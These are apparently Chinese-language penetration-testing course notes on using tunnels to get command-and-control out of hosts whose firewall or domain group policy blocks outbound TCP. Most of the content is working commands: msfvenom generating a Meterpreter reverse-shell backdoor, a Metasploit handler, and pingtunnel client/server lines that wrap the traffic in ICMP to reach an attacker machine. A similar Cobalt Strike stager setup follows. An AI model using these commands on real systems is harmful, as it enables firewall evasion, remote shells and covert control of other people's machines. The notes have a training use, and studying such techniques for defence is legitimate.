#知识点:
0、防火墙组策略对象
1、OSI七层协议模型
2、正反向监听器说明
3、隧道技术分层协议
4、CS&MSF&控制上线
-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
-连接方向:正向&反向(基础课程有讲过)
#系列点:
1、判断什么时候用代理
2、判断什么时候用隧道
3、判断出网和不出网协议
4、如何使用代理建立节点并连接
5、如何使用隧道技术封装协议上线
6、判断哪些代理或隧道情况选择放弃
#单机-防火墙-限制端口出入站
熟悉常见主机配置不出网的方式
1、入站&出站&连接安全
2、域&专用&公网&状态
3、阻止&允许&其他配置
#单机-防火墙-限制协议出入站
熟悉常见主机配置不出网的方式
1、程序&端口&预定义&自定义
2、协议&TCP&UDP&ICMP&L2TP等
#域控-防火墙-组策略对象同步
熟悉常见主机配置不出网的操作流程
操作:组策略管理-域-创建GPO链接-防火墙设置
更新策略:强制&命令&重启
命令:gpupdate/force
#域控-防火墙-组策略不出网上线
背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其中规则为出站规则,安全研究者通过入站取得SHELL权限,需要对其进行上线控制。
思路:正向连接&隧道技术
如果是入站被限制呢?反向连接&隧道技术也可以解决(前提看限制的多不多)
ICMP协议项目:
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel
1、MSF上线
生成后门:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > xd.exe
注意:这里设置lhosts为127.0.0.1,是因为在肉鸡上运行msf后门时,让其流量流向自己的3333端口(因为防火墙限制了TCP流量出站),然后pingtunnel工具会将3333端口的流量封装成ICMP流量,然后发送给攻击机192.168.46.66的4444端口(如此一来绕过了防火墙TCP流量不能出站的规则),最后到攻击机的流量又变回了TCP的,所以msf能够监听到。
MSF启动监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
Kali开启隧道:
./pingtunnel -type server
Win开启隧道 //将本地3333 icmp协议数据转发至66ip的4444流量上(管理员运行)
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.46.66 -t 192.168.46.66:4444 -tcp 1 -noprint 1 -nolog 1
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.1.9 -t 192.168.1.9:4444 -tcp 1 -noprint 1 -nolog 1
2、CS-ICMP-上线
Kali开启隧道:
./pingtunnel -type server
肉鸡:(管理器运行)
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1
CS:
监听器1:127.0.0.1 6666
监听器2:192.168.46.66 7777
生成监听器1的Stager后门肉鸡执行
注意:和刚刚的msf原理一致,让其流量流向自己的6666端口(因为防火墙限制了TCP流量出站),然后pingtunnel工具会将6666端口的流量封装成ICMP流量,然后发送给攻击机192.168.46.66的7777端口(如此一来绕过了防火墙TCP流量不能出站的规则),最后到攻击机的流量又变回了TCP的,所以CS能够监听到。